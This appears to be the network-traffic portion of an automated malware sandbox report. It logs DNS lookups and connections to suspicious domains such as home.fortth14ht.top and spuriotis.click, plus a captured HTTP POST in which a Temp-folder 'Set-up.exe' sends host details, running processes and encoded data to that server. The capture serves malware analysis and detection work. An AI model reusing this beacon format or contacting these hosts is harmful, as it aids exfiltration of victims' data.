Dec 27, 2024 14:51:31.199179888 CET	443	49728	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:31.199286938 CET	443	49728	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:31.199335098 CET	49728	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:31.202716112 CET	49728	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:31.202749014 CET	443	49728	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:31.202765942 CET	49728	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:31.202778101 CET	443	49728	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:31.248238087 CET	49735	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:31.248284101 CET	443	49735	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:31.248367071 CET	49735	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:31.248982906 CET	49735	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:31.248994112 CET	443	49735	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:31.350415945 CET	80	49729	185.121.15.192	192.168.2.5
Dec 27, 2024 14:51:31.350505114 CET	80	49729	185.121.15.192	192.168.2.5
Dec 27, 2024 14:51:31.350614071 CET	49729	80	192.168.2.5	185.121.15.192
Dec 27, 2024 14:51:31.350879908 CET	49729	80	192.168.2.5	185.121.15.192
Dec 27, 2024 14:51:31.470422983 CET	80	49729	185.121.15.192	192.168.2.5
Dec 27, 2024 14:51:32.505351067 CET	443	49735	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:32.505419970 CET	49735	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:32.506867886 CET	49735	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:32.506875992 CET	443	49735	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:32.507081985 CET	443	49735	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:32.513103008 CET	49735	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:32.513148069 CET	49735	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:32.513194084 CET	443	49735	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:33.292233944 CET	443	49735	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:33.292303085 CET	443	49735	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:33.292332888 CET	443	49735	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:33.292354107 CET	443	49735	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:33.292376041 CET	443	49735	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:33.292380095 CET	49735	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:33.292392969 CET	443	49735	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:33.292431116 CET	49735	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:33.292431116 CET	49735	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:33.292442083 CET	443	49735	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:33.308717966 CET	443	49735	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:33.308758974 CET	443	49735	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:33.308882952 CET	49735	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:33.308897972 CET	443	49735	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:33.308943033 CET	49735	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:33.317095995 CET	443	49735	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:33.360291958 CET	49735	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:33.411839962 CET	443	49735	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:33.453931093 CET	49735	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:33.492969990 CET	443	49735	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:33.496891975 CET	443	49735	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:33.496982098 CET	443	49735	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:33.496988058 CET	49735	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:33.497057915 CET	49735	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:33.497144938 CET	49735	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:33.497158051 CET	443	49735	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:33.497203112 CET	49735	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:33.497208118 CET	443	49735	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:33.712256908 CET	49741	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:33.712316990 CET	443	49741	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:33.712390900 CET	49741	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:33.712685108 CET	49741	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:33.712703943 CET	443	49741	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:34.936247110 CET	443	49741	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:34.936347008 CET	49741	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:34.938019991 CET	49741	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:34.938033104 CET	443	49741	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:34.938235044 CET	443	49741	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:34.942769051 CET	49741	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:34.942954063 CET	49741	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:34.942991972 CET	443	49741	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:36.255749941 CET	443	49741	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:36.255841017 CET	443	49741	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:36.255975008 CET	49741	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:36.256079912 CET	49741	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:36.256098032 CET	443	49741	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:36.349200010 CET	49747	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:36.349256039 CET	443	49747	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:36.349323034 CET	49747	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:36.349634886 CET	49747	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:36.349652052 CET	443	49747	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:37.859098911 CET	443	49747	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:37.859235048 CET	49747	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:37.860655069 CET	49747	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:37.860666990 CET	443	49747	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:37.860882044 CET	443	49747	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:37.862395048 CET	49747	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:37.862570047 CET	49747	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:37.862600088 CET	443	49747	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:37.862653971 CET	49747	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:37.862660885 CET	443	49747	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:38.695900917 CET	443	49747	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:38.696001053 CET	443	49747	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:38.696130991 CET	49747	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:38.696310997 CET	49747	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:38.696333885 CET	443	49747	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:38.901272058 CET	49753	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:38.901365995 CET	443	49753	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:38.901447058 CET	49753	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:38.901715994 CET	49753	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:38.901750088 CET	443	49753	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:40.170258999 CET	443	49753	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:40.170378923 CET	49753	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:40.218432903 CET	49753	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:40.218488932 CET	443	49753	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:40.218755007 CET	443	49753	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:40.253551960 CET	49753	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:40.253686905 CET	49753	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:40.253736973 CET	443	49753	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:40.253809929 CET	49753	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:40.253839970 CET	443	49753	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:41.185372114 CET	443	49753	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:41.185448885 CET	443	49753	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:41.185619116 CET	49753	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:41.185688019 CET	49753	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:41.185743093 CET	443	49753	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:41.341845989 CET	49760	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:41.341860056 CET	443	49760	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:41.344934940 CET	49760	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:41.345216990 CET	49760	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:41.345221996 CET	443	49760	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:43.085449934 CET	443	49760	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:43.085516930 CET	49760	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:43.086764097 CET	49760	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:43.086770058 CET	443	49760	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:43.086961985 CET	443	49760	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:43.088047981 CET	49760	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:43.088165998 CET	49760	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:43.088171005 CET	443	49760	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:44.073432922 CET	443	49760	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:44.073513031 CET	443	49760	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:44.073709965 CET	49760	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:44.073849916 CET	49760	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:44.073862076 CET	443	49760	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:44.474152088 CET	49767	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:44.474191904 CET	443	49767	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:44.474267960 CET	49767	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:44.474581957 CET	49767	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:44.474592924 CET	443	49767	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:45.687336922 CET	443	49767	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:45.687411070 CET	49767	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:45.688621044 CET	49767	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:45.688631058 CET	443	49767	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:45.688853979 CET	443	49767	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:45.689987898 CET	49767	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:45.690633059 CET	49767	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:45.690656900 CET	443	49767	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:45.690768957 CET	49767	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:45.690792084 CET	443	49767	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:45.690965891 CET	49767	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:45.691000938 CET	443	49767	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:45.691133022 CET	49767	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:45.691165924 CET	443	49767	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:45.691299915 CET	49767	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:45.691332102 CET	443	49767	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:45.691492081 CET	49767	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:45.691528082 CET	443	49767	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:45.691540956 CET	49767	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:45.691550970 CET	443	49767	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:45.691685915 CET	49767	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:45.691708088 CET	443	49767	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:45.691737890 CET	49767	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:45.691900969 CET	49767	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:45.691935062 CET	49767	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:45.735327959 CET	443	49767	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:45.735515118 CET	49767	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:45.735548019 CET	443	49767	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:45.735570908 CET	49767	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:45.735589027 CET	443	49767	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:45.735614061 CET	49767	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:45.735626936 CET	443	49767	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:48.028661966 CET	443	49767	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:48.028752089 CET	443	49767	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:48.028856993 CET	49767	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:48.029124975 CET	49767	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:48.029155016 CET	443	49767	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:48.037543058 CET	49775	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:48.037581921 CET	443	49775	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:48.037689924 CET	49775	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:48.038002968 CET	49775	443	192.168.2.5	104.21.2.51
Dec 27, 2024 14:51:48.038013935 CET	443	49775	104.21.2.51	192.168.2.5
Dec 27, 2024 14:51:48.844702959 CET	49775	443	192.168.2.5	104.21.2.51

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 14:51:07.644192934 CET	62851	53	192.168.2.5	1.1.1.1
Dec 27, 2024 14:51:07.644258022 CET	62851	53	192.168.2.5	1.1.1.1
Dec 27, 2024 14:51:07.781615973 CET	53	62851	1.1.1.1	192.168.2.5
Dec 27, 2024 14:51:07.948074102 CET	53	62851	1.1.1.1	192.168.2.5
Dec 27, 2024 14:51:14.905039072 CET	56801	53	192.168.2.5	1.1.1.1
Dec 27, 2024 14:51:15.123771906 CET	53	56801	1.1.1.1	192.168.2.5
Dec 27, 2024 14:51:21.342467070 CET	60045	53	192.168.2.5	1.1.1.1
Dec 27, 2024 14:51:21.342513084 CET	60045	53	192.168.2.5	1.1.1.1
Dec 27, 2024 14:51:22.085971117 CET	53	60045	1.1.1.1	192.168.2.5
Dec 27, 2024 14:51:22.533338070 CET	53	60045	1.1.1.1	192.168.2.5
Dec 27, 2024 14:51:27.711246967 CET	49884	53	192.168.2.5	1.1.1.1
Dec 27, 2024 14:51:27.711285114 CET	49884	53	192.168.2.5	1.1.1.1
Dec 27, 2024 14:51:27.851295948 CET	53	49884	1.1.1.1	192.168.2.5
Dec 27, 2024 14:51:27.851306915 CET	53	49884	1.1.1.1	192.168.2.5
Dec 27, 2024 14:51:28.871177912 CET	64182	53	192.168.2.5	1.1.1.1
Dec 27, 2024 14:51:29.187062979 CET	53	64182	1.1.1.1	192.168.2.5
Dec 27, 2024 14:51:29.511169910 CET	64183	53	192.168.2.5	1.1.1.1
Dec 27, 2024 14:51:29.511235952 CET	64183	53	192.168.2.5	1.1.1.1
Dec 27, 2024 14:51:29.648745060 CET	53	64183	1.1.1.1	192.168.2.5
Dec 27, 2024 14:51:29.648758888 CET	53	64183	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 27, 2024 14:51:07.644192934 CET	192.168.2.5	1.1.1.1	0x348b	Standard query (0)	httpbin.org	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:51:07.644258022 CET	192.168.2.5	1.1.1.1	0x1374	Standard query (0)	httpbin.org	28	IN (0x0001)	false
Dec 27, 2024 14:51:14.905039072 CET	192.168.2.5	1.1.1.1	0xeac6	Standard query (0)	yYkNteoVRFthbcESpvExVn.yYkNteoVRFthbcESpvExVn	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:51:21.342467070 CET	192.168.2.5	1.1.1.1	0xb796	Standard query (0)	home.fortth14ht.top	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:51:21.342513084 CET	192.168.2.5	1.1.1.1	0x721f	Standard query (0)	home.fortth14ht.top	28	IN (0x0001)	false
Dec 27, 2024 14:51:27.711246967 CET	192.168.2.5	1.1.1.1	0xff36	Standard query (0)	home.fortth14ht.top	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:51:27.711285114 CET	192.168.2.5	1.1.1.1	0x777f	Standard query (0)	home.fortth14ht.top	28	IN (0x0001)	false
Dec 27, 2024 14:51:28.871177912 CET	192.168.2.5	1.1.1.1	0xafad	Standard query (0)	spuriotis.click	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:51:29.511169910 CET	192.168.2.5	1.1.1.1	0x6d4a	Standard query (0)	home.fortth14ht.top	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:51:29.511235952 CET	192.168.2.5	1.1.1.1	0x6de3	Standard query (0)	home.fortth14ht.top	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 27, 2024 14:51:07.948074102 CET	1.1.1.1	192.168.2.5	0x348b	No error (0)	httpbin.org		34.226.108.155	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:51:07.948074102 CET	1.1.1.1	192.168.2.5	0x348b	No error (0)	httpbin.org		3.218.7.103	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:51:15.123771906 CET	1.1.1.1	192.168.2.5	0xeac6	Name error (3)	yYkNteoVRFthbcESpvExVn.yYkNteoVRFthbcESpvExVn	none	none	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:51:22.533338070 CET	1.1.1.1	192.168.2.5	0xb796	No error (0)	home.fortth14ht.top		185.121.15.192	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:51:27.851306915 CET	1.1.1.1	192.168.2.5	0xff36	No error (0)	home.fortth14ht.top		185.121.15.192	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:51:29.187062979 CET	1.1.1.1	192.168.2.5	0xafad	No error (0)	spuriotis.click		104.21.2.51	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:51:29.187062979 CET	1.1.1.1	192.168.2.5	0xafad	No error (0)	spuriotis.click		172.67.128.184	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:51:29.648758888 CET	1.1.1.1	192.168.2.5	0x6d4a	No error (0)	home.fortth14ht.top		185.121.15.192	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

httpbin.org

spuriotis.click

home.fortth14ht.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49713	185.121.15.192	80	2836	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2024 14:51:22.655287027 CET	12360	OUT	POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1 Host: home.fortth14ht.top Accept: / Content-Type: application/json Content-Length: 440470 Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 32 38 34 38 38 32 34 31 39 35 37 34 38 32 37 30 30 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED] Data Ascii: { "ip": "8.46.123.189", "current_time": "8428488241957482700", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 332 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 564 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 444 }, { "name": "svchost.exe", "pid": 732 }, { "name": "svchost.exe", "pid": 280 }, { "name": "svchost.exe" [TRUNCATED]
Dec 27, 2024 14:51:22.775046110 CET	2472	OUT	Data Raw: 56 48 4a 32 5c 2f 48 2b 6c 53 55 55 41 56 66 6e 5c 2f 77 42 6e 39 61 50 6e 5c 2f 77 42 6e 39 61 64 52 57 6c 50 72 38 6a 53 6e 31 2b 58 36 6c 65 69 70 58 36 66 6a 5c 2f 51 31 46 57 68 30 55 2b 76 79 47 4d 72 5c 2f 5c 2f 41 46 75 6e 38 5c 2f 38 41 Data Ascii: VHJ2\/H+lSUUAVfn\/wBn9aPn\/wBn9adRWlPr8jSn1+X6leipX6fj\/Q1FWh0U+vyGMr\/\/AFun8\/8AE1FVjy3Xnf8A5\/Gq9BoNPR\/x\/wDQRUNWKqP0\/H+hoNvf\/u\/iPqOTt+NSU1\/un8P5igohopfKf\/nmP8\/hSUGlPr8v1I5O34\/0qOpWbHA6\/wAv\/r1FQdFPr8gqvVio2XuPx\/xoNCOq9Tfx\/wDAf60
Dec 27, 2024 14:51:22.775201082 CET	7416	OUT	Data Raw: 70 6f 4f 67 72 66 78 4a 76 54 35 50 2b 57 71 53 66 76 34 50 72 64 66 6c 2b 48 36 55 4e 5c 2f 72 49 58 5c 2f 77 42 63 66 2b 57 73 6e 62 6a 5c 2f 41 44 2b 74 50 6a 43 52 74 76 32 53 49 6c 78 2b 39 49 5c 2f 31 48 5c 2f 62 72 37 5c 2f 7a 39 2b 31 4d Data Ascii: poOgrfxJvT5P+WqSfv4Prdfl+H6UN\/rIX\/wBcf+Wsnbj\/AD+tPjCRtv2SIlx+9I\/1H\/br7\/z9+1Mkz9wfJ+98r\/SOv+c\/5NdADP8AlpN\/B5cX\/LT9\/P8A5\/8A1etEn7vf++l\/d\/vYf8\/l7fXoQDaz\/wCs2eb+6\/df5\/8Ar4B60\/8A2Jvk8z\/W\/uv346\/5z\/8AXyAU23SSu\/8A0180+vX\/AD\/P
Dec 27, 2024 14:51:22.775223017 CET	3708	OUT	Data Raw: 4f 4c 2b 43 4c 36 5c 2f 35 5c 2f 72 7a 54 6f 5c 2f 37 6d 2b 4e 50 4d 69 5c 2f 31 6e 5c 2f 4c 43 48 76 5c 2f 6e 2b 59 70 6e 6d 66 76 4e 2b 2b 54 38 2b 5c 2f 77 44 50 72 32 71 6a 6f 49 5a 49 5c 2f 4b 32 4f 6d 55 54 5c 2f 41 4e 45 34 2b 76 70 39 4f Data Ascii: OL+CL6\/5\/rzTo\/7m+NPMi\/1n\/LCHv\/n+YpnmfvN++T8+\/wDPr2qjoIZI\/K2OmUT\/ANE4+vp9OKHkRvnRIkeP91\/rf3E39PrzT93zRui\/8srjjyj\/AIZpm1\/k8v8A55eb\/wA8J\/z\/APr9KAGeX5kiP9\/97\/x8Rn16XX5\/06Uz54Y4P9Zs\/wBI8ry\/+vr8ftv+c9qkk2RyTfJGieVz\/nrzRHIY9jomz
Dec 27, 2024 14:51:22.775234938 CET	1236	OUT	Data Raw: 5c 2f 58 7a 4b 39 49 56 33 65 76 34 56 4c 4a 32 5c 2f 48 2b 6c 52 30 46 6a 4e 67 39 5c 2f 38 5c 2f 68 54 64 68 39 76 38 5c 2f 68 55 74 46 41 46 65 69 70 4a 4f 33 34 31 48 51 64 41 56 58 71 78 55 54 39 66 77 5c 2f 71 61 41 47 56 48 35 66 76 38 41 Data Ascii: \/XzK9IV3ev4VLJ2\/H+lR0FjNg9\/8\/hTdh9v8\/hUtFAFeipJO341HQdAVXqxUT9fw\/qaAGVH5fv8Ap\/8AXqSig6CvRUknb8f6VHQAzYPf\/P4VBmT+9\/n8qtVFI2Pw5P17f596vnfl\/XzOgZULLt9xU1FVzrz\/AK+YFeipWj9OPY\/5\/wAaio515\/18zoK9FSeX7\/p\/9eo6s0p9fl+pGf8AWr\/umo6k\/wCWn
Dec 27, 2024 14:51:22.775254965 CET	4944	OUT	Data Raw: 2f 4f 4f 6c 4d 5c 2f 75 4a 74 6a 35 36 39 76 4a 2b 6c 42 33 45 4d 6d 7a 35 48 2b 34 2b 66 2b 65 76 48 2b 52 32 37 66 68 54 50 6e 2b 2b 69 62 5c 2f 77 44 70 33 5c 2f 41 66 6d 66 36 63 55 34 66 63 6a 5c 2f 38 41 61 6e 5c 2f 48 78 5c 2f 6e 31 70 70 Data Ascii: /OOlM\/uJtj569vJ+lB3EMmz5H+4+f+evH+R27fhTPn++ib\/wDp3\/Afmf6cU4fcj\/8Aan\/Hx\/n1pp+87874\/wB15n+cnk\/SgPa\/3vw\/4BBt8tt\/\/bKKP\/P+e\/pUXlpH+5dP\/wBXf+g\/wq1JJ99B8\/ceZL+44\/z3\/pUDbPM+dJX\/AHQ83\/6\/Jx\/Q1p7Pz\/D\/AIJ0DJPJ\/gTf5f8An29P5+lQybG
Dec 27, 2024 14:51:22.775358915 CET	4944	OUT	Data Raw: 50 53 66 45 4d 76 78 49 2b 43 58 77 78 30 65 2b 74 64 57 73 66 41 66 69 69 4b 79 31 50 77 70 71 5c 2f 69 53 30 61 39 30 31 37 65 56 34 54 4a 43 30 6b 66 69 7a 77 37 72 50 67 7a 34 64 5c 2f 46 58 34 6f 61 72 71 50 67 65 5c 2f 38 41 44 6e 77 55 2b Data Ascii: PSfEMvxI+CXwx0e+tdWsfAfiiKy1Pwpq\/iS0a9017eV4TJC0kfizw7rPgz4d\/FX4oarqPge\/8ADnwU+MVz8Dvidp2geKL++8WeEfGmk+Dvhp4m8WTapod\/4a0iE6F4F174t+Cfhh4z1Ox1O+bRviVqcej\/AGa40e503X7\/APO+HuJfo75NxLn\/AIg8M5pwrlHEXii+HsBxHnGE+tZdU4qr5B\/yT2JzDB1KdDD1MbCjx
